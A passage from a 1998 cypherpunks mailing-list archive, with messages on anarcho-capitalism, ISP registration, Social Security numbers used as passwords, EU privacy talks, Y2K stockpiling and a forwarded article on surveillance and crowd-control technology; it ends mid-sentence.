> We've all got our pet peeves.  Would you like to live under mine?  Would
> I like to live under yours?  Can I trust you to be tolerant?  Can I
> trust your successors, 20 years from now?  Can my descendants trust
> subsequent successors, 200 years later?  Experience tends to show the
> contrary.

There is more at stake than toleration or trust. You paint with too narrow a
brush. If you're saying we should have anarchy then you're as kooky as the
people who don't literaly interpret the Constitution.

> The anarcho-capitalist free market is not one where "everything goes,"
> and there is indeed a strong concept of individual rights.  What is
> moral and not moral is defined by society on an individual basis.  The
> first and only rule is:

First, it is one of everything-goes because there is no mechanism that will
stop anybody from doing anything. There are NO concepts of *rights* in such
a system, let alone individual rights. If anything the only rights are who
has the capitalist backing to stave off the anarchic forces. That's not
justice, equality, or respect for rights.

> No one has the right to initiate force against another or another's
> property.

Attack me with your body and property and watch it happen junior.

> This is the fundamental and only "social contract" we make.  Anyone who
> disagrees with this is obviously antisocial, and nobody's going to want
> to live with him (or allow him to continue living, if he attacks
> someone).

Oh bullshit. There is much more involved like not stealing which isn't the
use of force and allowed by your anarcho-capatilism as well as your
definition of valid use of force above.

It's gibberish.

> >From this, morality follows.  If X does Y to Z, and if Y is perceived as
> immoral, then X is not going to be very popular with Z or anyone else,
> unless he can make amends.  No one will want to trade with him, be near
> him, etc.  This is a very strong motive to avoid doing immoral things.

Will you get religion the hell out of here please. Y is obviously popular
with X or else they wouldn't have used it. It further follows that there are
more than one X-type out there. So your premise falls down on its face in
the dirt.

> If Y is really nasty, such as the initiation of force, then X is going
> to be in *deep* trouble.

With who? In an anarcho-capitalist society as you paint it the optimal strategy
is to allow others to reduce your competition opening up the market for you.

Let's take an example. Imagine we live on a street and we notice a person
going from house to house down the other side of the street. What is our
optimal strategy? It isn't to call the cops (there aren't any) and it isn't
to immediately kill the intruder (it isn't our property after all) since
there is an opportunity to make a considerable gain here improving our
status in the society as a whole. The optimal strategy is to wait and let
this bozo kill our neighbors up to our house and *then* kill the intruder.
At that point we have just inhereted an entire street of houses and its
included properties. You put up a fence across each end of the street and
wallah, your own little fifedom. If you're really lucky something similar
will happen on the next street over and they won't be as lucky at killing
the intruder. Then after they are all dead and the intruder has consolidated
their gains (probably by fencing their street in) you can begin to scheme
ways of taking that property since its obvious yours is next.

>  Z may well shoot him out of self defense, and
> even if he survives his action, he'll have to pay a *lot* of restitution
> before people will trust him again, if ever.  Law enforcement by
> ostracism --read L. Neil Smith's "The Probability Broach", for a more
> detailed description.  

Wait a second, there is no law to enforce here outside of make money, obtain
property, keep somebody else from taking it.

> In summary, a free market is far from being an immoral market.  In fact,
> it is the most moral market there is, since there is no state which
> holds the "right" to initiate force.

In summary a free-market is a anarchy of kill or be killed, take or get
taken. He with the most goodies wins until somebody with a better strategy
comes along. There is nothing to moderate the use of force, especialy when
its the optimal strategy to increase ones holdings.

Your spouting gibberish.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 8 Nov 1998 02:04:35 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Stip club plays by rules and wins...for now [CNN]
Message-ID: <199811071736.LAA02199@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 7 Nov 1998 11:34:45 -0600
> X-within-URL: http://customnews.cnn.com/cnews/pna.show_story?p_art_id=3130419&p_section_name=U.S.

>            STRIP CLUB FINDS WAY AROUND CITY RESTRICTION: LET KIDS IN
>                                        
>    AP
>    06-NOV-98
>    
>    NEW YORK (AP) -- A New York City strip club has found a loophole that
>    allows it to wriggle past the mayor's crackdown on sex-oriented
>    businesses.
>    
>    The club says its policy is to admit kids -- if they're accompanied by
>    adults.
>    
>    Therefore, it argues, it's not an adult business.
>    
>    A judge agrees.
>    
>    Mayor Rudolph Giuliani is livid.

[rest deleted]


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 8 Nov 1998 02:23:52 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: A question about the new ISP ruling and email...
Message-ID: <199811071757.LAA02280@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I was pondering the draconian implications of the requirement to register
ISP's. Would an email only site be an ISP under these regulations?

What I had in mind was a box sitting here on a link to the Internet and
several local dial-ins. When a user logged in they could start pine, elm,
slip, or ppp. It would support inbound only telnet. The only commands that
would execute besides the above would be exit, quit, bye. There would not
need to be any directory access or related issues. The only storage avaiable
would be quotas on email buffer size.

Would such a commercial entity require registry to be protected?

I have to talk with a lawyer and find out if TAG needs registered. If so
then I'd be interested in participating in a civil liberties suit.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 8 Nov 1998 04:46:17 +0800
To: cypherpunks@Algebra.COM
Subject: RE: Quick, Dear -- Beat Me
In-Reply-To: <3.0.3.32.19981107090029.008caa20@apf2.com>
Message-ID: <v03130300b26a5707776a@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/enriched

 At 12:00 AM -0800 11/7/98, Albert P. Franco, II wrote:
So much for the SSN "never" becoming a national ID number! 

Since your SS account and pension can be negatively impacted, this tends to reinforce the idea that your SSN should be a secret. But how can we keep it a secret if they keep putting it on public documents such as drivers licenses? Seems to me that when they are all done making the SSN the official National ID number they will need to give us a NEW SSN that is secret, kind of like a PIN to unlock and validate our National ID and SS accounts. 

...and latter a PIN to protect the PIN...


Many business entities are now using part or all of the SSN as a _password_ for my account, or as a phone identifying validation number.

"And could we have the last four digits of your Social Security Number please?"

I've tried pointing out to the drones that SSNs are becoming ubiquitous, the anyone accessing my account besides me would probably have access to my SSN, and so on. A waste of time, as the drones neither known nor care.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,  
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets, 
Licensed Ontologist         | black markets, collapse of governments.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sun, 8 Nov 1998 05:26:42 +0800
To: cypherpunks@toad.com
Subject: genetic copy protection
Message-ID: <3.0.5.32.19981107124923.007d7660@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



	
A patent on a means to produce seeds which germinate, but
which produce plants whose seeds are sterile, was
reviewed in Science, p 850, 30 Oct 98 vol 282.

The trick is that the seeds are genetically engineered, 
and the seeds are 'activated' by an antibiotic (which
acts like a signal).  The purpose is to copy-protect
other engineered genes in the organism.

US pat 5,723,765

David Honig

  "When horsemeat is outlawed, only outlaws will eat horsemeat"










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 8 Nov 1998 07:08:02 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 6.10: Washington to Seek Public's Advice on EU Privacy Laws
Message-ID: <199811072128.NAA19713@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 6.10: Washington to Seek Public's Advice on EU Privacy Laws
Date: Thu, 5 Nov 1998 00:29:18 -0800
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 6.10: Washington to Seek Public's Advice on EU Privacy Laws
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Thursday November 5, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: Fox News, November 4, 1998
http://www.foxnews.com

U.S. Negotiators Ask For Public Feedback in Talks With Europe Over Privacy
Law
http://www.foxnews.com/js_index.sml?content=/news/wires2/1104/n_ap_1104_334
.sml

NEW YORK - Raising the stakes in its talks with Europe over a new privacy
law there, the Commerce Department on Wednesday publicly reaffirmed a
laissez-faire approach toward protecting personal privacy that remains at
odds on key positions taken by European negotiators.

The Commerce Department released a statement for public feedback that
details its basic position in the talks. The talks attempt to resolve deep
differences over a sweeping European privacy measure that has the potential
to disrupt some commerce with the United States.

The law took effect on Oct. 26, but sanctions were suspended while the
talks go on.

U.S. firms from global drug makers to direct marketers doing business in
Europe fear the new directive could bar them from using customers'
confidential information for everything from valuable scientific research
to junk mail, stifling business commerce.

In its position paper, the U.S. reiterated its view that U.S. companies
should not be forced to give people access to personal information about
themselves. In addition, companies should have the option to choose an
independent industry group to police its privacy policies, instead of a
government body, as required by the European law.

"For now, we're trying to get (Europe's) reaction to these principles
themselves,'' said David Aaron, under secretary of Commerce. Aaron said the
United States wants to give companies "safe harbors'' to satisfy privacy
protection demands.

Some experts said the government's seeking of public comment could suggest
that the United States may seek to modify its position if enough people
favor the European approach.

"This is significant because it is the first time that the Commerce
Department has asked for public comment on its negotiating position with
the European Union,'' said Joel Reidenberg, a law professor at Fordham
University and an expert on U.S.-Europe relations.

A Commerce Department spokeswoman said the principles would be posted on
its Web site.

(c) 1998, News America Digital Publishing, Inc. d/b/a Fox Market Wire.

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.














****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 8 Nov 1998 07:05:42 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Crunch Time for Y2K Suppliers
Message-ID: <199811072128.NAA19724@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Crunch Time for Y2K Suppliers
Date: Thu, 05 Nov 1998 11:22:46 -0600
To: believer@telepath.com

Source:  Wired
http://www.wired.com/news/news/politics/story/16035.html?3

Crunch Time for Y2K Suppliers
 by Declan McCullagh 

 4:00 a.m.5.Nov.98.PST
 The phones are already ringing when Steve
 Portela arrives at his office every morning.
 Orders are piling up as they never have before.
 Walton Feed, his bulk food company, doubled
 its workforce this year to 125 people and a new
 warehouse will open in late November. 

 It isn't enough. Orders placed today won't be
 delivered for six months. 

 "I'm falling further behind every day," Portela
 complains. 

 The source of Portela's woes? Widespread
 worries about the Year 2000 computer problem.
 The looming bug has sent thousands of
 Americans scrambling to load up on bulk food,
 generators, solar cells, and gold coins. Some of
 the products, if ordered today, won't arrive on a
 customer's doorstep until spring 1999. And
 delays are expected to grow. 

 Spikes in demand are nothing new to Portela.
 The Mount St. Helens eruption, the Los Angeles
 riots, and the last major California earthquake all
 spurred people into grabbing their credit cards
 and phoning Walton Feed. From a perch 6,000
 feet up in the Idaho mountains, the company
 has grown into one of the nation's largest bulk
 food suppliers. 

 But nervous jitters caused by those disruptions
 are peanuts compared to growing fears that Y2K
 will snarl electric power, telecommunications,
 and the banking system. 

 "Add it all together, and Y2K surpasses
 everything," Portela says. 

 This time it's not just survivalists stockpiling
 sealed barrels from Walton's extensive selection
 of wheat, rice, and other dried foods. 

 "It's common everyday folks, people just like
 you," Portela says of his customers. "We're not
 talking about any radical people." 

 Other food companies have similar bellyaches. 

 "The demand is amazing -- 99.99 percent of the
 people we deal with are preparing for Y2K," says
 Tamera Toups, office manager for
 Montana-based Peace of Mind Essentials." 

 Unlike Walton's, Peace of Mind Essentials
 doesn't boast a storeroom full of towering bins of
 grain. Instead, it places orders that are later
 filled by warehouses. Toups estimates volume
 has leapt 500 percent this year. 

 "If anyone doesn't have an order in by the end of
 April, their chances of getting it before 2000 are
 pretty slim," she said. "The window might be
 even smaller than that." 

You'll still be able to buy bulk food after next
 April, of course. America Inc., a food exporter,
 has plenty of it. But Walton Feed makes a niche
 product prized by Y2Kers: sealed 50-pound
 drums of food with the oxygen removed, a
 process that delays spoilage and eliminates
 grain-munching critters. A year's supply tips the
 scales at 600 pounds and costs $300, plus
 shipping. 

 Trying to procure a diesel generator, on the other
 hand, is shaping up to be increasingly difficult. 

 Loren Day, president of China Diesel Imports,
 spends a good portion of each day puzzling out
 how to crank out more and more generators to
 meet a swell of Y2K orders. Shipments of his
 company's most popular 8,000-watt model are
 already running six months behind. 

 "Orders are up about 1,000 percent since the
 first of the year," Day says. "And the amount of
 people who will want a generator now is nothing
 compared to the amount of people who will want
 a generator later." 

 Day, whose 50-person company is the largest
 US distributor of diesel generators, usually sells
 to rural customers who live beyond the reach of
 electric power lines. 

 "Now with this Y2K thing it's gone crazy," he
 said. He said he now has the both of the world's
 largest generator manufacturers running at near
 capacity to satisfy US demand. 

 Why don't Y2Kers simply pick up a $500
 gasoline generator at Home Depot or their local
 hardware store? Day believes they're so worried
 about the oft-criticized reliability of the portable
 units, that they're willing to pay diesel prices,
 starting at $1,750. 

 "The main thing is the longevity and fuel
 economy of the diesel," he said. Diesel fuel is
 an oil, so it keeps longer than gasoline, which
 spoils after a year. 

Those Y2K consumers who dread running out of
 fuel are also turning to renewable energy. 

 "We're totally swamped by Y2K," said Laura
 Myers, a sales representative for solar
 equipment distributor Sunelco. "We're beginning
 to see some lead times on some of our
 products. By next spring it's going to be insane."

 Sales at the Hamilton, Montana-based Sunelco
 have tripled because of Y2K, Myers said. She
 predicts that orders placed after next spring
 won't arrive until 2000. 

 "It's been a huge increase," said Davy Rippner, a
 vice president at Alternative Energy Engineering,
 a California-based firm. 

 "The things that we're out of and we can't keep
 in stock are the Baygen [hand-cranked] radios
 and the Russian-made hand-dynamo
 flashlights." 

 Then there are the full-blown home solar
 systems, which start at $3,000 and can range
 up to $30,000. 

 "A lot of small installers around the country that
 have been struggling to make a living are now
 booked for months in advance," said Karen
 Perez, who publishes Home Power magazine
 with her husband Richard from the couple's
 off-the-grid home outside of Ashland, Oregon. 

 The Perez family won't do anything to prepare for
 Y2K -- except spend time handling the sharp
 uptick in recent subscriptions to their magazine.

 "We're six miles from the nearest phone and
 power line," she said. "As far as Y2K with us,
 the only thing that I'm planning on doing
 personally is getting a stash of non-hybrid
 seeds." 

 Non-hybrid seeds are particularly prized by
 Y2Kers who stay up nights worrying that
 potential widespread computer crashes could
 disrupt food distribution. Most hardware store
 seeds are hybrid varieties. They grow well, but
 they can be sterile. 

 Since seeds from hybrid plants may not
 germinate, some Y2Kers are stockpiling the
 non-hybrid varieties. 

 "[We've been] getting calls about bulk seeds and
 buying in quantities and packing them for
 storage for some period of time," said Dave
 Smith, vice president of Seeds of Change in
 Santa Fe, New Mexico. 

 "We definitely think that there will be an
 increase in sales because of this problem." 

 Burt Blumert doesn't need to speculate. The
 Burlingame, California, company he owns,
 Camino Coin, has seen sales of precious metal
 coins double from last year because of Y2K
 jitters. "It's widespread now," Blumert said. 

 In May, Blumert began to run ads for a "Y2K Life
 Preserver," a $3,500 collection of coins that
 includes British gold sovereigns, silver dollars,
 and pre-1965 silver dimes and quarters. 

 He markets the collection as a kind of financial
 Y2K insurance policy, just in case banking
 glitches or more widespread problems call for a
 permanent currency. 

 "When people buy gold, they're dropping out,"
 he said. "This is the ultimate dropout, when the
 institutions themselves aren't working." 

 Copyright (c) 1994-98 Wired Digital Inc.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 8 Nov 1998 07:05:56 +0800
To: cypherpunks@cyberpass.net
Subject: IP: TOTALITARIAN TECHNOLOGY
Message-ID: <199811072128.NAA19735@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Bill Kingsbury <kingsbry@gte.net>
Subject: IP: TOTALITARIAN TECHNOLOGY
Date: Thu, 05 Nov 1998 14:47:59 -0500
To: ignition-point@majordomo.pobox.com

 from:  http://www.newdawnmagazine.com.au/50a.htm=20


 TOTALITARIAN TECHNOLOGY --
 The Truth is Closer Than Fiction
 ---------------------------------
 By SUSAN BRYCE=20

 Over the last decade, Hollywood has sensitised us to totalitarian
 technology. Block buster movies portray our heroes and heroines
 using the weapons of the new millennium. Militarised police forces
 keep citizens safe; android warrior personnel, part human, part
 robot are gainfully employed as global peacekeepers; prisoners are
 incarcerated in high tech electronic jails, controlled with
 implanted microchips, while the free population is kept under
 surveillance through the use of biometric identity systems.=20

 Science fiction perhaps? Reality yes! Much of what we see on the
 big screen is not the latest fantasy of Hollywood script writers,
 but is based on fact. Any film maker wanting a picture of the
 future need look no further than existing military technology and
 research. =20

 A recent report published by the European Parliament, "An Appraisal
 of the Technologies of Political Control", shows just how far these
 new technologies have come, and how they are being actively
 employed against citizens in countries across the globe.=20

 The report warns of "an overall technological and decision drift
 towards world wide convergence of nearly all the technologies of
 political control", including identity recognition; denial;
 surveillance systems based on neural networks; new arrest and
 restraint methods and the emergence of so called `less lethal'
 weapons.=20

 Developments in surveillance technology, innovations in crowd
 control weapons, new prison control systems, the rise of more
 powerful restraint, torture, killing and execution technologies and
 the role of privatised enterprises in promoting such technologies
 pose a grave threat to our immediate and future freedoms.=20


 Trade in Technologies of Control=20

 Cutting edge developments made by the Western military-industrial
 complex are providing invaluable support to various governments
 throughout the world. The report "Big Brother Incorporated", by
 surveillance watchdog Privacy International, presents a detailed
 analysis of the international trade in surveillance technology. =20

 Privacy International says it is concerned about "the flow of
 sophisticated computer-based technology from developed countries to
 developing countries -- and particularly to non-democratic regimes
 where surveillance technologies become tools of political control." =20

 The international trade in surveillance technology (known as the
 Repression Trade), involves the manufacture and export of
 technologies of political control. More than seventy per cent of
 companies manufacturing and exporting surveillance technology also
 export arms, chemical weapons or military hardware.=20

 The justification advanced by the companies involved in this trade
 is identical to the justification advanced in the arms trade --
 i.e.: that the technology is neutral. Privacy International's view
 is that in the absence of legal protection, the technology can
 never be neutral. =20

 As "Big Brother Incorporated" points out, "even those technologies
 intended for `benign' uses rapidly develop more sinister purposes.
 The UK manufactured `Scoot' traffic control cameras in Beijing's
 Tianamen Square were automatically employed as surveillance cameras
 during the student demonstrations. Images captured from the cameras
 were broadcast over Chinese television to ensure that the
 `offending' students were captured." =20

 Privacy International cites numerous cases where this type of
 technology has been obtained for the express purpose of political
 and social control...=20

    -- ICL (International Computers Limited) provided the
       technological infrastructure to establish the South African
       automated Passbook system, upon which much of the function of
       the apartheid regime depended. =20

    -- In the 1980s Israeli company Tadiram developed and exported
       the technology for the computerised death list used by the
       Guatemalan police. =20

    -- Reported human rights abuses in Indonesia -- particularly
       those affecting East Timor -- would not be possible without
       the strategic and technological support of Western companies.
       Among those companies supplying the Indonesian police and
       military with surveillance and targeting technology are
       Morpho Systems (France), De la Ruue Printak (UK), EEV Night
       Vision (UK), ICL (UK), Marconi Radar and Control Systems
       (UK), Pyser (UK), Siemens Plessey Defense Systems (UK),
       Rockwell International Corporation (USA) and SWS Security
       (USA). =20


 Tools of Repression for 'Democratic' States=20

 We should not forget that the same companies supplying regimes with
 repression technology, also supply `democratic' states with their
 totalitarian tools. =20

 Leutcher Associates Inc. of Massachusetts supplies and services
 American gas chambers, as well as designing, supplying and
 installing electric chairs, auto-injection systems and gallows. The
 Leutcher lethal injection system costs approximately $30,000 and is
 the cheapest system the company sells. Their electrocution systems
 cost =A335,000 and a gallows would cost approximately $85,000. More
 and more US states are opting for Leutcher's $100,000 "execution
 trailer" which comes complete with a lethal injection machine, a
 steel holding cell for an inmate, and separate areas for witnesses,
 chaplain, prison workers and medical personnel. Some companies in
 Europe have even offered to supply gallows.=20

 In the 1970's, J.A. Meyer of the US Defense Department suggested a
 countrywide network of transceivers for monitoring all prisoners on
 parole, via an irremovable transponder implant. The idea was that
 parolees movements could be continuously checked and the system
 would facilitate certain areas or hours to be out of bounds, whilst
 having the economic advantage of cutting down on the costs of
 clothing and feeding the prisoner. If prisoners go missing, the
 police could automatically home in on their last position. =20

 Meyer's vision came into operational use in America in the mid
 1980's, when some private prisons started to operate a transponder
 based parole system. The system has now spread into Canada and
 Europe where it is known as electronic tagging. Whilst the logic of
 tagging is difficult to resist, critics argue that the recipients
 of this technology appear not to be offenders who would have been
 imprisoned, but rather low risk offenders who are most likely to be
 released into the community anyway. Because of this, the system is
 not cheaper since the authorities gain the added expense of
 supplying monitoring devices to offenders who would have been
 released anyway. Electronic tagging is however beneficial to the
 companies who sell such systems. Tagging also has a profitable role
 inside prisons in the US and in some prisons, notably, DeKalb
 County Jail near Atlanta, where all prisoners are bar coded.=20


 'Non-Lethal' Technology of Control=20

 The increasing militarisation of police forces throughout the world
 is reflected in the spread of "less lethal" weapons such as pepper
 gas. Benignly referred to by the media as "capsicum spray", pepper
 gas was recently used by Australian police in the state of Victoria
 to subdue a man. According to media reports, the Victorian police
 also used "a weapon they don't want to disclose". =20

 The effects of pepper gas are far more severe than most people
 realise. It is known to cause temporary blindness, a burning
 sensation of the skin which lasts from 45 to 60 minutes, upper body
 spasms which force a person to bend forward and uncontrollable
 coughing making it difficult to breathe or speak for between 3 to
 15 minutes.=20

 For those with asthma or subject to restraining techniques which
 restrict the breathing passages, there is a risk of death. The Los
 Angeles Times has reported at least 61 deaths associated with
 police use of pepper spray since 1990 in the USA, and the American
 Civil Liberties Union (ACLU) has documented 27 deaths in custody of
 people sprayed with pepper gas in California alone, since 1993.=20

 The US Army concluded in a 1993 Aberdeen Proving Ground study that
 pepper spray could cause "Mutagenic effects, carcinogenic effects,
 sensitization, cardiovascular and pulmonary toxicity,
 neuro-toxicity, as well as possible human fatalities." =20

 The existing arsenal of weapons designed for public order and
 control will soon be joined by a second generation of kinetic,
 chemical, optico-acoustic, and microwave weapons, adding to the
 disabling and paralysing technologies already available. Much of
 the initial work on these new technologies has been undertaken in
 US nuclear laboratories such as Oak Ridge, Lawrence Livermore and
 Los Alamos. The European Parliament Report "An Appraisal of the
 Technologies of Political Control" lists a Pandora's box of new
 technologies including:=20

    -- Ultra-sound generators, which cause disorientation, vomiting
       and involuntary defecation, disturbing the ear system which
       controls balance and inducing nausea. The system which uses
       two speakers can target individuals in a crowd. =20

    -- Visual stimulus and illusion techniques such as high
       intensity strobes which pulse in the critical epileptic
       fit-inducing flashing frequency and holograms used to project
       active camouflage. =20

    -- Reduced energy kinetic weapons. Variants on the bean bag
       philosophy which ostensibly will result in no damage (similar
       claims were once made about plastic bullets). =20

    -- New disabling, calmative, sleep inducing agents mixed with
       DMSO which enables the agent to quickly cross the skin
       barrier and an extensive range of pain causing, paralysing
       and foul-smelling area-denial chemicals. Some of these are
       chemically engineered variants of the heroin molecule. They
       work extremely rapidly, one touch and disablement follows.
       Yet one person's tranquillisation may be another's lethal
       dose. =20

    -- Microwave and acoustic disabling systems. =20

    -- Human capture nets which can be laced with chemical irritant
       or electrified to pack an extra disabling punch. =20

    -- Lick `em and stick `em technology such as the Sandia National
       Laboratory's foam gun which expands to between 35-50 times
       its original volume. Its extremely sticky, gluing together
       any target's feet and hands to the pavement. =20

    -- Aqueous barrier foam which can be laced with pepper spray. =20

    -- Blinding laser weapons and isotrophic radiator shells which
       use superheated gaseous plasma to produce a dazzling burst of
       laser like light. =20

    -- Thermal guns which incapacitate through a wall by raising
       body temperature to 107 degrees. =20

    -- Magnetosphere gun which delivers what feels like a blow to
       the head. =20

 "An Appraisal of the Technologies of Political Control" says "we
 are no longer at a theoretical stage with these weapons. US
 companies are already piloting new systems, lobbying hard and where
 possible, laying down potentially lucrative patents." For example,
 last year New Scientist reported that the American Technology
 Corporation (ATC) of Poway, California has used what it calls
 acoustical heterodyning technology to target individuals in a crowd
 with infra-sound to pinpoint an individual 200-300 metres away. The
 system can also project sonic holograms which can conjure audio
 messages out of thin air so just one person hears them. Meanwhile,
 Jane's reported that the US Army Research Laboratory has produced a
 variable velocity rifle for lethal or non lethal use -- a new twist
 to flexible response. Other companies are promoting robots for use
 in riot and prison control.=20


 Advances in Biometric Identification=20

 Through the inevitability of gradualness, repression technology, in
 the form of biometric identity systems, is permeating our every day
 life. Biometry involves using a physical characteristic such as a
 fingerprint, palm print, iris or retina scan to identify
 individuals. These unique identity charact-eristics are digitally
 stored on a computer system for verification. This way, the
 identity of each person can be compared to the stored original.
 Christians will be interested to note that with biometric systems,
 the original print is stored not as a `picture' but as an
 algorithm. The number of your name will be literally in your hand
 (thumb print) or in your forehead (eyes).=20

 Biometric identification is not something that we just see at the
 movies. It is here, it is with us now. Governments in Australia,
 the USA and the UK are planning its widespread introduction by
 2005. =20

 Both the Dutch and Australian public rejected plans for a national
 information and identification scheme en masse several years ago,
 but have reacted more passively to equally intrusive (but less
 blatant) schemes in the 1990's.=20

 Uses of the Social Security Number in the USA, the Social Insurance
 Number in Canada, the Tax File Number in Australia, the SOFI Number
 in the Netherlands and the Austrian Social Security Number have
 been extended progressively to include taxation, unemployment
 support, pensioner benefits and, in some cases, health and higher
 education. Functional creep is rampant.=20

 Large scale government computer based schemes have been shown in
 several countries to be much less cost-effective than was
 originally estimated. Years after the governments of the United
 States and Australia developed schemes to match public sector data,
 there is still no clear evidence that the strategy has succeeded in
 achieving its goals. The audit agencies of both federal governments
 have cast doubt that computer matching schemes deliver savings. =20

 A nationwide survey by Columbia University last year reported that
 83% of people approve of the use of finger imaging. Biometrics is
 being embraced on a global scale. The Australian company,
 Fingerscan, a subsidiary of Californian based Identix Inc, recently
 won one of the biggest bank contracts for biometric security in the
 world. Fingerscan is working with the Bank of Central Asia in
 Jakarta, Indonesia to replace numeric passwords for employees at
 5000 branches with fingerprint based system access.=20

 Fingerscan also has the world's largest application of biometrics
 in the servicing of automated teller machines. In conjunction with
 contractor Armaguard, which services ATMs for Australian banks,
 many ATMs are now unlocked by the representative's fingerprint. The
 representative brings a portable scanning device that plugs into
 the back of the ATM and connects the bank's server which grants him
 or her admittance. =20

 The US government has a deadline of 1999 to implement electronic
 benefits processing for welfare recipients, but this may be delayed
 to accommodate biometrics, which is currently being piloted in five
 American states. The Australian government will introduce a
 biometric identity system for welfare recipients by 2005.=20

 Blue Cross and Blue Shield in the USA have plans to introduce
 nationwide fingerprinting for hospital patients. This may be
 extended into other medical applications. The Jamaican Government
 is planning to introduce electronic thumb scanning to control
 elections. Social Security verification using biometrics is used in
 Spain and South Africa. In 1994, the UK Department of Social
 Security developed a proposal to introduce a national
 identification card, which recommended a computerised database of
 the hand-prints of all 30 million people receiving government
 income assistance. =20


 Big Brother's International Network of Surveillance=20

 Biometric identification is the technology of today and the future.
 It is not a matter of if, but when, a global network of computers
 will link all stored biometric images in a central location,
 managed by a collective of international authorities. =20

 In 1994, under the leadership of US Centre for Strategic and
 International Studies (CSIS), a consortium of the world's leading
